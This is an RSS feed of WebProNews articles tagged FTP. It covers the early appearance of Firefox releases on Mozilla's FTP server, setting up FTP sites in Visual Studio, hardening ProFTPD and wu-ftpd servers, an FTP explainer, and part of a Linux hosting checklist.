<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>WebProNews &#187; FTP</title>
	<atom:link href="http://www.webpronews.com/tag/ftp/feed" rel="self" type="application/rss+xml" />
	<link>http://www.webpronews.com</link>
	<description>Breaking News in Tech, Search, Social, &#38; Business</description>
	<lastBuildDate>Mon, 13 Feb 2012 00:02:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Firefox 4 Available a Day Prior To Official Release</title>
		<link>http://www.webpronews.com/firefox4-release-leak-2011-03</link>
		<comments>http://www.webpronews.com/firefox4-release-leak-2011-03#comments</comments>
		<pubDate>Mon, 21 Mar 2011 21:02:03 +0000</pubDate>
		<dc:creator>John Vinson</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Date]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[Firefox 4]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[leak]]></category>
		<category><![CDATA[public]]></category>
		<category><![CDATA[release]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=59622</guid>
		<description><![CDATA[Hot on the heels of the Internet Explorer 9 release, Firefox 4 is officially releasing tomorrow (March 22nd). However, for those who can&#8217;t wait another minute, the unofficial download is available. As with things of this nature, WebProNews doesn&#8217;t condone &#8230;]]></description>
			<content:encoded><![CDATA[<p>Hot on the heels of the Internet Explorer 9 release, Firefox 4 is officially releasing tomorrow (March 22nd). However, for those who can&#8217;t wait another minute, <a href="http://www.betanews.com/article/Get-Firefox-4-final-a-day-ahead-of-its-official-release/1300736617">the unofficial download is available</a>. As with things of this nature, WebProNews doesn&#8217;t condone unauthorized downloading, and so on and so forth.</p>
<p>It was discovered that the final release for Firefox 4 was up on their FTP server, which was then subsequently provided to users though numerous websites. Mozilla strongly discourages these direct downloads, as the current location isn&#8217;t equipped for massive traffic. So if you feel like being courteous to Mozilla, wait until tomorrow.</p>
<p>If you visit the index.html file on the FTP server, you&#8217;ll be met with the following message:</p>
<p><img src="http://images.ientrymail.com/webpronews/firefox4.jpg" alt="Firefox 4 message" /></p>
<p>According to the website <a href="http://fileforum.betanews.com/">Fileforum</a>, they&#8217;ve already had over 60,000 downloads for Windows since releasing the links on their site. There are also clients for both Linux and Mac.</p>
<p>It&#8217;s been nearly eight months since the original Firefox 4 beta was released publicly. Mozilla has been scrutinized for pushing back their initial release date which was supposed to happen last fall. We&#8217;ll all be able to find out either today, or tomorrow, whether or not the wait was worth it.</p>
<p>The battle for our browser usage has a new chapter, and it will certainly be interesting to see who is able to gain and who will fall back. Though I don&#8217;t condone anyone using Mozilla&#8217;s FTP server, if you get an early download, feel free to share your thoughts on it below.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/firefox4-release-leak-2011-03/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>The MUST HAVE Magazine Of Firefox Add-Ons</title>
		<link>http://www.webpronews.com/the-must-have-magazine-of-firefox-addons-2006-10</link>
		<comments>http://www.webpronews.com/the-must-have-magazine-of-firefox-addons-2006-10#comments</comments>
		<pubDate>Wed, 25 Oct 2006 19:15:06 +0000</pubDate>
		<dc:creator>Brajeshwar Oinam</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Cake]]></category>
		<category><![CDATA[FeedDemon]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Link]]></category>
		<category><![CDATA[Mac]]></category>
		<category><![CDATA[Magazine]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Mozilla]]></category>
		<category><![CDATA[Newsgator]]></category>
		<category><![CDATA[thunderbird]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=32351</guid>
		<description><![CDATA[Well, the <a href="http://releases.mozilla.org/pub/mozilla.org/firefox/releases/" class="bluelink">FTP link</a> was seen everywhere and almost everybody in the little-ahead - techno-sphere were already playing with the <a href="http://www.mozilla.com/en-US/press/mozilla-2006-10-24.html" class="bluelink">Release</a> Version of Firefox 2.0 from <a href="http://www.mozilla.com/" class="bluelink">Mozilla </a>even before the official announcement was made.
]]></description>
			<content:encoded><![CDATA[<p>Well, the <a href="http://releases.mozilla.org/pub/mozilla.org/firefox/releases/" class="bluelink">FTP link</a> was seen everywhere and almost everybody in the little-ahead &#8211; techno-sphere were already playing with the <a href="http://www.mozilla.com/en-US/press/mozilla-2006-10-24.html" class="bluelink">Release</a> Version of Firefox 2.0 from <a href="http://www.mozilla.com/" class="bluelink">Mozilla </a>even before the official announcement was made.</p>
<p><b>Some good points -</b>
<ul>
<li>I don&#8217;t really open more than about 10 tabs at max and thus the individual close button is a boon.</li>
<li>I love the realtime spell check.</li>
<li>The seamless integration of Feeds is another kick-ass feature. You can <a href="http://labnol.blogspot.com/2006/07/firefox-20-tutorial-add-new-rss.html" class="bluelink">customize</a> it to your choice of application to handle the Feeds. For instance, I&#8217;ve defaulted it to <a href="http://www.newsgator.com/" class="bluelink">Newsgator</a> Online which syncs with<a href="http://www.newsgator.com/NGOLProduct.aspx?ProdID=NetNewsWire" class="bluelink"> NetNewsWire </a>for the <a href="http://mac.brajeshwar.com/" class="bluelink">Mac</a> and <a href="http://www.newsgator.com/NGOLProduct.aspx?ProdID=FeedDemon" class="bluelink">FeedDemon</a> for Windows.</li>
</ul>
<p><b>Mozilla</b>
<ul>
<li>Visit the official <a href="http://www.mozilla.com/" class="bluelink">Firefox/Thunderbird site</a></li>
<li><a href="https://addons.mozilla.org/" class="bluelink">Firefox Add-ons</a></li>
<li> Mozilla&#8217;s own favorite and<a href="https://addons.mozilla.org/firefox/recommended/" class="bluelink"> Recommended Add-ons for Firefox 2.0</a></li>
</ul>
<p><b>Firefox 2.0 Reviews</b>
<ul>
<li> <a href="http://www.readwriteweb.com/archives/firefox_20_review.php" class="bluelink">Read/Write Web</a></li>
</ul>
<p><b>References</b>
<ul>
<li>Read <a href="http://weblogs.mozillazine.org/mitchell/archives/2006/10/firefox_moving_the_internet_fo.html" class="bluelink">Moving the Internet Forward </a>from <a href="http://weblogs.mozillazine.org/mitchell/" class="bluelink">Mitchell Baker</a></li>
<li><a href="http://www.readwriteweb.com/archives/firefox_2_launch_interview.php" class="bluelink">Interview With Chris Beard, Mozilla VP Products</a></li>
<li><a href="http://www.mozilla.com/en-US/press/mozilla-2006-10-24.html" class="bluelink">Firefox 2.0 Release Notes</a></li>
<li>Oinam&#8217;s list of <a href="http://forum.oinam.com/viewtopic.php?id=33" class="bluelink">Firefox Add-ons </a>(This will be updated regularly to delete deprecated ones and put new recommended ones. This is exclusively for our team and may not be suitable to you in some circumstances.)</li>
<li><a href="http://www.techcrunch.com/2006/10/24/the-new-mozilla-recommended-add-ons-list-the-winners-and-the-losers/" class="bluelink">The New Mozilla Recommended Add-ons List: The Winners and the Losers</a></li>
<li>[Photo]<a href="http://www.flickr.com/photos/jollyjake/278562314/" class="bluelink"> Microsoft sends a congratulation cake to Mozilla</a></li>
<li>Read Chris Messina&#8217;s <a href="http://factoryjoe.com/blog/2006/10/19/the-beast-has-awoken-or-the-beginning-of-web-20/" class="bluelink">The beginning of Web 2.0,</a> a cold war of the web browser lurking around the corner.</li>
<li>[Video] Chill out a bit at <a href="http://www.firefoxflicks.com/" class="bluelink">Firefox Flicks</a></li>
</ul>
<p><a href="http://www.brajeshwar.com/archives/2006/10/firefox-20-released-get-the-must-have-magazine-of-addons/#comments" class="bluelink">Comments</a></p>
<p>Tag: </p>
<p>Add to <a href="http://del.icio.us/post"onclick="window.open('http://del.icio.us/post?v=4&#038;partner=wpn&#038;noui&#038;jump=close&#038;url='+encodeURICo  mponent(location.href)+'&#038;title ='+encodeURIComponent(document.title),'delicious','toolbar=no,width=700,height=400'); return   false;" CLASS="printMailTop"><img src=http://images1.ientrymail.com/webpronews/delicious-pic.png border=0> Del.icio.us</a> |   <a  href="javascript:voidwindow.open('http://digg.com/submit?phase=2&#038;url='+encodeURIComponent(window.location.href)+'&#038;ei=UTF-8','  popup','width=520px,height=420px,status=0,location=0,resizable=1,scrollbars=1,left=100,top=50',0)"><img   src=http://images1.ientrymail.com/webpronews/digg-pic.png border=0> Digg</a>  | <a href="javascript:void   window.open('http://myweb2.search.yahoo.com/myresults/bookmarklet?t='+encodeURIComponent(document.title)+'&#038;u='+encodeURICompo  nent(window.location.href),'popup','width=520px,height=420px,status=0,location=0,resizable=1,scrollbars=1,left=100,top=50',0)   "><img src=http://images1.ientrymail.com/webpronews/yahoo-pic.png border=0> Yahoo! My Web</a> | <a href="javascript:location.href='http://www.furl.net/storeIt.jsp?u='+encodeURIComponent(document.location.href)+'&#038;t='+encodeUR  IComponent(document.title)+' '"><img src=http://images1.ientrymail.com/webpronews/furl-pic.png border=0> Furl</a></p>
<p><a href="<a href=http://www.webpronews.com><img src=http://images.ientrymail.com/webpronews/wpn-readit.jpg border=0></a>&#8221; class=&#8221;bluelink&#8221;>Bookmark WebProNews: <a href=http://www.webpronews.com><img src=http://images.ientrymail.com/webpronews/wpn-readit.jpg border=0></a></a></p>
<p>Brajeshwar is an ace digerati and an ardent believer of<br />
KISS (Keep It Simple Stupid), he envisions pushing the technical<br />
envelope time and again for the betterment of commercial and<br />
practical applications.</p>
<p>http://www.brajeshwar.com/</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/the-must-have-magazine-of-firefox-addons-2006-10/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ASP.NET: How to Create an FTP Web Site</title>
		<link>http://www.webpronews.com/aspnet-how-to-create-an-ftp-web-site-2006-08</link>
		<comments>http://www.webpronews.com/aspnet-how-to-create-an-ftp-web-site-2006-08#comments</comments>
		<pubDate>Mon, 21 Aug 2006 21:14:48 +0000</pubDate>
		<dc:creator>Joel Murach</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=31035</guid>
		<description><![CDATA[This article is an excerpt from the book: <i>Murach's ASP.NET 2.0 Web Programming with C# 2005.</i>
]]></description>
			<content:encoded><![CDATA[<p>This article is an excerpt from the book: <i>Murach&#8217;s ASP.NET 2.0 Web Programming with C# 2005.</i></p>
<p>An FTP web site is a web site that resides on a remote computer and that supports FTP file transfers. In most cases, FTP web sites are hosted on a server that you have access to over the Internet. In that case, the web site may already be set up for you. If not, you can use the Choose Location dialog box shown in figure 4-3 to create a new web site.</p>
<p> To display this dialog box, select FTP for the location option from the New Web Site dialog box, and click the Browse button. Then, enter the name of the server where you want to create the site and the path to the directory where the files for the web site will be stored. Note that except for the final directory, all the directories in the directory path must already exist. In this example, that means that the Murach directory must already exist. That&#8217;s because this directory maps to a <i>virtual root</i> that must be set up on the server. The virtual root works much like an IIS virtual directory. However, it points to the location where files are transferred to and from the server.</p>
<p> In addition to the server name and directory path, you can specify the port that Visual Studio should use to send commands to the server, you can specify whether the connection to the server is established using active or passive mode, and you can specify whether you&#8217;re logged in as an anonymous user or an authenticated user. In most cases, you&#8217;ll leave the port set at 21. However, you may need to change the Passive Mode and Anonymous Login options.</p>
<p> By default, Visual Studio uses <i>active mode</i> to establish a connection with the FTP server. To understand how active mode works, you need to realize that two ports are required to use FTP: one to transmit commands and one to transmit data. In active mode, Visual Studio connects to the server using the command port and then passes the address of the data port to be used to the server. Then, the server connects to Visual Studio using the data port.</p>
<p> The problem with using active mode is that if the client computer is behind a firewall, the server probably won&#8217;t be able to connect to it. In that case, you can connect to the server using <i>passive mode</i>. With passive mode, Visual Studio establishes the connections for both the command port and the data port. To use passive mode, just select the Passive Mode option.</p>
<p> In some cases, an FTP server will require that you provide a username and password to connect to the server. Then, you&#8217;ll need to remove the check mark from the Anonymous Login option and enter the required information in the Username and Password text boxes that become available. Note that because this information is saved until you end Visual Studio, you only need to enter it the first time you connect to the server during a Visual Studio session.</p>
<p> After you enter the required information into the Choose Location dialog box, you click the Open button to return to the New Web Site dialog box. When you do, the location will look something like this:</p>
<p><code>ftp://Murach/Ch03Cart</code></p>
<p>Then, you can just click the OK button to create the web site.</p>
<p><b>The dialog box for creating an FTP web site</b></p>
<p><center> <img src="http://img.webpronews.com/webpronews/ftp_0821.jpg"> </center></p>
<p>Description</p>
<p> To create a new FTP web site, select FTP from the Location drop-down list in the New Web Site dialog box. Then, click the Browse button to display the Choose Location dialog box shown above.</p>
<p> Enter the name of the server and the directory where you want to create the web site. You can typically leave the port set at 21.</p>
<p>  Visual Studio can use either <i>active mode</i> or <i>passive mode</i> to establish connections to the FTP server. Active mode is the default. If the client is behind a firewall, though, you may need to use passive mode. To do that, select the Passive Mode option.</p>
<p>  By default, Visual Studio logs you in to the FTP server as an anonymous user. However, some FTP servers require you to provide a username and password. In that case, you can deselect the Anonymous Login option and then enter your username and password. The username and password are saved until you end the Visual Studio session.</p>
<p>  If you try to create a new FTP web site by entering a URL in the New Web Site dialog box, Visual Studio will display a dialog box that lets you specify whether you want to use passive mode and whether you want to log in as an anonymous user.</p>
<p>  IIS can be configured to act as an FTP server as well as a web server. For more information, please see appendix A.</p>
<p>Tag: </p>
<p>Add to <a   href="http://del.icio.us/post"onclick="window.open('http://del.icio.us/post?v=4&#038;partner=wpn&#038;noui&#038;jump=close&#038;url='+encodeURICo  mponent(location.href)+'&#038;title ='+encodeURIComponent(document.title),'delicious','toolbar=no,width=700,height=400'); return   false;" CLASS="printMailTop"><img src=http://images1.ientrymail.com/webpronews/delicious-pic.png border=0> Del.icio.us</a> |   <a       href="javascript:voidwindow.open('http://digg.com/submit?phase=2&#038;url='+encodeURIComponent(window.location.href)+'&#038;ei=UTF-8','  popup','width=520px,height=420px,status=0,location=0,resizable=1,scrollbars=1,left=100,top=50',0)"><img   src=http://images1.ientrymail.com/webpronews/digg-pic.png border=0> Digg</a>  | <a href="javascript:void   window.open('http://myweb2.search.yahoo.com/myresults/bookmarklet?t='+encodeURIComponent(document.title)+'&#038;u='+encodeURICompo  nent(window.location.href),'popup','width=520px,height=420px,status=0,location=0,resizable=1,scrollbars=1,left=100,top=50',0)   "><img src=http://images1.ientrymail.com/webpronews/yahoo-pic.png border=0> Yahoo! My Web</a> | <a   href="javascript:location.href='http://www.furl.net/storeIt.jsp?u='+encodeURIComponent(document.location.href)+'&#038;t='+encodeUR  IComponent(document.title)+' '"><img src=http://images1.ientrymail.com/webpronews/furl-pic.png border=0> Furl</a></p>
<p>Bookmark WebProNews: <a href=http://www.webpronews.com><img src=http://images.ientrymail.com/webpronews/wpn-readit.jpg border=0></a></p>
<p>Joel Murach has been writing and editing for more than 10 years. During that time, he sharpened his programming skills as a contract programmer in San Francisco and his instructional skills as a trainer for HarperCollins Publishing. He always brings a vision to his projects that leads to improved effectiveness for his readers.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/aspnet-how-to-create-an-ftp-web-site-2006-08/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>White Paper  on FTP and Telnet Replacement</title>
		<link>http://www.webpronews.com/white-paper-on-ftp-and-telnet-replacement-2005-11</link>
		<comments>http://www.webpronews.com/white-paper-on-ftp-and-telnet-replacement-2005-11#comments</comments>
		<pubDate>Tue, 29 Nov 2005 17:10:40 +0000</pubDate>
		<dc:creator>Chris Crum</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[eBusiness]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[WebProNews]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=24885</guid>
		<description><![CDATA[Enterprise security solutions provider SSH Communications Security has released a white paper called "<a href="http://aj.600z.com/aj/4309/0/clickCGI?z=1&#038;pos=10&#038;c=4209&#038;b=4311" class="bluelink">Replacing FTP and Telnet in Cross-Platform Networks</a>".
]]></description>
			<content:encoded><![CDATA[<p>Enterprise security solutions provider SSH Communications Security has released a white paper called &#8220;<a href="http://aj.600z.com/aj/4309/0/clickCGI?z=1&#038;pos=10&#038;c=4209&#038;b=4311" class="bluelink">Replacing FTP and Telnet in Cross-Platform Networks</a>&#8220;.</p>
<p>The <a href="http://aj.600z.com/aj/4309/0/clickCGI?z=1&#038;pos=10&#038;c=4209&#038;b=4311" class="bluelink">white paper</a> discusses key areas for companies to consider when looking for  products and technologies for a secure replacement of FTP, Telnet, and other system administration methods. </p>
<p> &#8220;Plaintext Telnet and FTP connections constitute a serious risk to the integrity of enterprise networks,&#8221; says <a href="http://aj.600z.com/aj/4309/0/clickCGI?z=1&#038;pos=10&#038;c=4209&#038;b=4311" class="bluelink">SSH</a>. &#8220;Due to the challenging new legislations, stricter auditor requirements, and more sophisticated network attacks, security is no longer an option &#8211; it is a must.&#8221; </p>
<p>If you are interested in reading the white paper, you can <a href="http://aj.600z.com/aj/4309/0/clickCGI?z=1&#038;pos=10&#038;c=4209&#038;b=4311" class="bluelink">download it here</a>.</p>
<p>Chris is a staff writer for  <a href="http://www.webpronews.com">WebProNews</a>. Visit WebProNews for the <a href="http://www.WebProNews.com">latest ebusiness news</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/white-paper-on-ftp-and-telnet-replacement-2005-11/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ProFTPd, wu-ftpd, and general ftp security</title>
		<link>http://www.webpronews.com/proftpd-wuftpd-and-general-ftp-security-2004-12</link>
		<comments>http://www.webpronews.com/proftpd-wuftpd-and-general-ftp-security-2004-12#comments</comments>
		<pubDate>Mon, 27 Dec 2004 15:26:45 +0000</pubDate>
		<dc:creator>A.P. Lawrence</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=13488</guid>
		<description><![CDATA[FTP in general has a long and sad history of security problems. If you need to run an ftp server, you need to keep careful track of vulnerabilites and exploits that may make for a very unhappy day.
]]></description>
			<content:encoded><![CDATA[<p>FTP in general has a long and sad history of security problems. If you need to run an ftp server, you need to keep careful track of vulnerabilites and exploits that may make for a very unhappy day.</p>
<p>Things have gotten better in recent years, but just as I started this article I checked the <a href="http://www.wu-ftpd.org/">wu-ftpd</a> site and found a fairly recent problem noted, and an even more recent problem discussed at <a href="http://www.proftpd.org/">proftpd.org</a> . Makes you want to forget ftp entirely, doesn&#8217;t it? </p>
<p>I do think the more widespread availablility of ssh (hence scp and sftp) has made anything but anonymous ftp less necessary, and that does help &#8211; at least there aren&#8217;t as many unencrypted logins flying around. </p>
<p>The main problem with ftp is that it almost always runs with root privilege, at least part of the time. It needs to bind to low ports (20 and 21) at a minimum, which requires root, and there are probably other points where it needs more than ordinary user abilities. Modern implementations try to avoid being root when they don&#8217;t need to, but of course that&#8217;s not perfect. Other damage limiting attempts involve running in a <a href="http://nwc.securitypipeline.com/howto/showArticle.jhtml?articleId=15306130">chroot jail</a>. </p>
<p>Note there is a bit of a difference between the chroot options often present in ftp configuration files and a real unix level chroot. To use the latter, you need to set up a number of files and directories to include libraries, vital commands and files like /etc/passwd and more. The &#8220;chroot&#8221; options for ftp daemons mean that an ftp login can&#8217;t cd above the specified point. These are similar restrictions, but technically quite different. </p>
<p>There are many, many ftp server programs available. I found a short list at <a href="http://www.linuxmafia.com/faq/Network_Other/ftp-daemons.html">http://www.linuxmafia.com/faq/Network_Other/ftp-daemons.html</a> and I&#8217;m sure there are many more. However, the most commonly found are wu-ftp and proftp (though vsftp is becoming more popular). Any ftp daemon is going to have its share of features and quirks, and of course its own security measures. Most all will provide at least basic security like setting umask and determining who can or cannot use the server. I won&#8217;t be covering everything in what follows, but will hit the highlights. </p>
<p><b>FTP Security Basics</b></p>
<p>One simple security step with any ftp server is not to help by advertising. Here&#8217;s a talkative server just begging for you to go look up its vulnerabilities: </p>
<p><code>ProFTPD 1.2.4 Server (FTP) [ftp.xyz.com]</code></p>
<p>If you add &#8220;ServerIdent Off&#8221; to the proftd.conf, it&#8217;s a bit less chatty: </p>
<p><code>220 ftp.xyz.com FTP server ready.</code></p>
<p>For wu-ftp, the file is &#8220;ftpaccess&#8221;, and you want &#8216;greeting terse&#8217; or &#8216;greeting brief&#8217;. </p>
<p>You surely also want to disallow certain users from using ftp. It would usually be a very poor idea to let root have an ftp login, for example. With both wu-ftp and proftp (and many other ftp&#8217;s), you list disallowed users in /etc/ftpusers. Proftpd disallows root by default, regardless of ftpusers. If you did &#8220;RootLogin on&#8221; in proftpd.conf, you&#8217;d still need to remove root from /etc/ftpusers should you need this. </p>
<p>You can also restrict to certain ip&#8217;s: </p>
<p><code>proftpd.conf: </p>
<p>&lt;Limit LOGIN&gt;<br />
Order Allow,Deny<br />
Allow 192.168.2.8, mydomain.com, anotherdomain.net,<br />
Deny from all<br />
&lt;/Limit&gt;</p>
<p>wu-ftpd ftpaccess:<br />
(from man page)</p>
<p>&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp       deny &lt;addrglob&gt; &lt;message_file&gt;</p>
<p>&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp            Always deny access to  host(s)  matching  &lt;addrglob&gt;.<br />
&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp            &lt;message_file&gt;   is  displayed.   &lt;addrglob&gt;  may  be<br />
&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp            "!nameserved" to deny access to sites without a working<br />
&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp            nameserver.   It may also be the name of a file,<br />
&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp            starting with a slash  ('/'),  which  contains<br />
&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp            additional   address  globs,  as  well  as  in  the  form<br />
&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp            address:netmask or address/cidr.</code></p>
<p>To prevent password guessing, you may set limits on login attempts: </p>
<p><code>proftpd.conf:</p>
<p>MaxLoginAttempts&#038;nbsp&#038;nbsp&#038;nbsp&#038;nbsp    	4</p>
<p>wu-ftpd ftpaccess:</p>
<p>loginfails 3</code></p>
<p>You can also do things like limiting the total number of ftp sessions, though your ability to do that will have to be external if the daemon is started on demand by inetd or xinetd (<a href="http://aplawrence.com/Basics/xinetd.html">xinetd</a> includes feature for limiting connections). If run standalone, the main instances spawns off children to handle connections, and can limit those as desired. </p>
<p>Although not strictly a security issue, you can set limits on the amount of data or number of files that can be transferred, how long people can remain logged on, etc. See &#8220;man ftpaccess&#8221; for wu-ftpd and <a href="http://www.proftpd.org/docs/directives/linked/by-name.html">http://www.proftpd.org/docs/directives/linked/by-name.html</a> for proftpd.conf. </p>
<p><b>Anonymous FTP</b></p>
<p>To have anonymous ftp, you usually need a little bit of setup. If you don&#8217;t have an &#8220;ftp&#8221; user, you&#8217;ll need to create that. Note that ftp servers allow &#8220;anonymous&#8221; as a synonym for ftp. That&#8217;s from a config setting in proftpd.conf: </p>
<p><code>proftpd.conf:  UserAlias&#038;nbsp&#038;nbsp&#038;nbsp	anonymous ftp</code></p>
<p>No special definition is necessary for wu-ftpd. </p>
<p>For most ftp&#8217;s, you need a /var/ftp/ directory for anonymous ftp to work. The configuration files usually have examples of what you have to turn on for anonymous ftp. </p>
<p>There are configuration limits here: </p>
<p><code>proftpd.conf:</p>
<p>MaxClients&#038;nbsp&#038;nbsp&#038;nbsp	10 "Maximum anon users reached, try again later"</p>
<p>wu-ftpd ftpaccess:</p>
<p>limit anon 120 SaSu|Any2000-0600 /etc/msg.toomuchload<br />
limit anon 30 Any /etc/msg.toomuchload<br />
# Allows more users on weekends and 8PM to 6AM</code></p>
<p>Apparently sftp can be setup for anonymous use also (<a href="http://www.mcknight.de/jftpgw/howtouse-sftp.html">http://www.mcknight.de/jftpgw/howtouse-sftp.html</a>, see last paragraph), though I&#8217;ve never seen it done. That said, a lot of sites don&#8217;t even turn on sftp at all: it&#8217;s a setting in the config file: </p>
<p><code>Subsystem  sftp    /usr/libexec/sftp-server</code></p>
<p><b>FTP Clients</b></p>
<p>My current favorite is <a href="http://aplawrence.com/Unixart/<a%20href=">lftp</a>. My least favorite is Internet Explorer, though I will often have clents use that if I need them to ftp somewhere from Windows. Note that they can provide a login and password: use ftp://usr:password@ftphost.com, so you can use that even for an ftp to a user directory on your network. </p>
<p>*Originally published at <a href="http://www.aplawrence.com">APLawrence.com</a></p>
<p>A.P. Lawrence provides SCO Unix and Linux consulting services http://www.pcunix.com</p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/proftpd-wuftpd-and-general-ftp-security-2004-12/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is FTP?</title>
		<link>http://www.webpronews.com/what-is-ftp-2004-12</link>
		<comments>http://www.webpronews.com/what-is-ftp-2004-12#comments</comments>
		<pubDate>Mon, 13 Dec 2004 20:26:07 +0000</pubDate>
		<dc:creator>Mitch Keeler </dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[FTP]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=13269</guid>
		<description><![CDATA[In the past I have defined many Web hosting jargon words that have sent many people to scratching their heads and calling upon the mighty powers of Google to look for an answer. Today I have one more for you. How many times have you hear of somebody saying they needed to FTP something? How about that they need to find a good FTP client? Thankfully FTP is a pretty simple concept to get your mind wrapped around.
]]></description>
			<content:encoded><![CDATA[<p>In the past I have defined many Web hosting jargon words that have sent many people to scratching their heads and calling upon the mighty powers of Google to look for an answer. Today I have one more for you. How many times have you hear of somebody saying they needed to FTP something? How about that they need to find a good FTP client? Thankfully FTP is a pretty simple concept to get your mind wrapped around.</p>
<p>FTP stands for file transfer protocol. What in the heck is File Transfer Protocol? The easy way to look at it would be to say it is just a way of transferring files over the Internet from one computer to another. Thinking of the Internet as one big network, FTP is the process in which you can get files from one computer to another computer across the globe. </p>
<p>Most of the time that other computer is going to be your Web hosting server, which in itself is a computer. </p>
<p>Think of it as your Web page files taking a hike across the country in a few seconds. No need to pack the camping gear, get out the toothbrush or even a change of underwear. With the high speed Internet access we have today even larger files can be moved pretty quickly. </p>
<p>FTP came to be way before the time of the Internet we know and love today. It was first used as only a series of text comands to move files from one computer to another over a network. While it hasn&#8217;t evolved from the main purpose it had, it has &#8220;grown up&#8221; I guess you could say. Now we use programs such as SmartFTP or CuteFTP to do the work for us. </p>
<p>Many of these FTP programs have features on top of features. The only ones you will probably ever use though is the act of connecting to your Web server to upload or download files, documents and folders.</p>
<p>Mitch Keeler is a guy who likes to help people out in his own charismatic and odd way. Instead of showing somebody how to do something, he much more enjoys having people see the problem and the solution through his own eyes. Mitch has worked as an article and content writer for various Web sites around the globe. </p>
<p>Mitch Keeler is also a former Customer Service Director and Customer Service Manager for a large Web hosting company. Please feel free to <a href="http://www.mitchkeeler.com/contact.php">contact Mitch</a> or look over his <a href="http://www.mitchkeeler.com/about.php">impressive resume of accomplishments</a>. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.webpronews.com/what-is-ftp-2004-12/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Top 10 Essential Ingredients of Every LINUX HOSTING Plan (Package)</title>
		<link>http://www.webpronews.com/the-top-essential-ingredients-of-every-linux-hosting-plan-package-2004-11</link>
		<comments>http://www.webpronews.com/the-top-essential-ingredients-of-every-linux-hosting-plan-package-2004-11#comments</comments>
		<pubDate>Fri, 19 Nov 2004 15:18:28 +0000</pubDate>
		<dc:creator>Teeyes Siva</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.webpronews.com/?p=12851</guid>
		<description><![CDATA[Any website comprises the following - Domain name, Webspace, Webpages.
]]></description>
			<content:encoded><![CDATA[<p>Any website comprises the following &#8211; Domain name, Webspace, Webpages.</p>
<p>Lets say, You have got your Domain Name (www.yourdomain.com). Its time to check for a good hosting service provider to have your files uploaded in the domain. If you are opting for Linux Based Hosting Plan, make sure you have the following included in your plans : </p>
<p><b>1. Control Panel </b>- This is the nucleus of your website. In a Control Panel, popularly known as CP, you can literally do anything. The moment you signup for a Hosting Pack, you must be provided with a CP to manage your webspace. </p>
<p><b>2. POP3 email Ids &#038; Aliases</b> &#8211; yourname@yourdomain.com is an example POP3 ID. You must be provided with ample of POP3 email ids and it depends on the Package size. </p>
<p><b>3. FTP Accounts &#038; Virtual FTP</b> &#8211; This is where you upload your files, delete them, update them. This again comes along with the CP. Make sure you have handful of FTP sub-accounts also to provide your clients/users password protected directories. This is very much useful wherein your clients / users can use the FTP to upload /download files from particular password protected folder of your website. </p>
<p><b>4. Backup</b> &#8211; Most of the Hosts take Automated Backups. But users do not take much care on this while choosing the Hosting Pack. This feature is as essential as anyother in this list. </p>
